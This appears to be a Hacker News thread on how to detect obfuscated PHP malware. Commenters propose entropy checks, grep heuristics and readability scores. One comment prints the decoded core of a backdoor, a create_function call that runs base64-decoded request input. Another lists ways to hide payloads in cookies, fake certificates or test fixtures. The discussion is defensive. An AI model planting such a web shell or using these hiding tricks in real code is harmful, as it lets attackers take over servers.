It's hard to find obfuscations of stuff. ran across this recently... <?php $z0=$...

egwynn · on Jan 24, 2019

You might be able to catch that by looking for lines with unusually high entropy. Something like this: https://codereview.stackexchange.com/a/909

acdha · on Jan 24, 2019

The problem with approaches like this is that they're prone to false positive/negatives. Take the example above — you could move more payload into the REQUEST variable (say a Cookie header), do more of the array of numbers so no individual token is that noteworthy, you could do something like toss that into a wrapper so someone sees something which looks like (and may actually be) an x509 cert or GPG public key with some misleading comment about that being used to verify updates, toss it into an image or other “fixture” in a test directory a la event-stream, etc.

This is a much harder problem than anything someone is going to come up with in an HN reply on first reaction. People have been working on it for decades but it's especially hard because once a technique becomes popular an attacker can run offline attacks against it and not release their exploit until they've confirmed that it's not detected.

_cereal · on Jan 24, 2019

Agree that is difficult to catch it. For the log, in this case there are both functions, the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution

The `create_function()`[1] will internally execute `eval()` so the result would be the same.

[1] http://php.net/create_function

dotancohen · on Jan 24, 2019

Grep for multiple semicolons on a line. Or lines exceeding N characters. Or `$_` outside some specific places. Or multiple short variable names on the same line. Or "<?php[^$]".

Salt and flavour per your coding style and code base.

jerf · on Jan 24, 2019

No, that's just an arms race, and it's advantage attacker since in security we generally assume the attacker has our source and executables. Plus it's ultimately an instance of the halting problem; there is no way to run code to determine if another piece of code is "good" for any sensible definition of "good". (See Rice's Theorem.)

You need to ensure bad stuff can't get in, not let stuff in and try to determine what's bad after the fact.

dotancohen · on Jan 27, 2019

What aspect of information security is not inherently advantage attacker?

Regarding "ensure bad stuff can't get in", that is a completely different aspect. No matter how well you "ensure", bad stuff will always get it. Thus security is done in layers.

doublekill · on Jan 24, 2019

You could create a readability score from normal non-malicious code.

Eventhough I do not know what above code does, at a glance, I can tell that this is not normal code. A machine could too.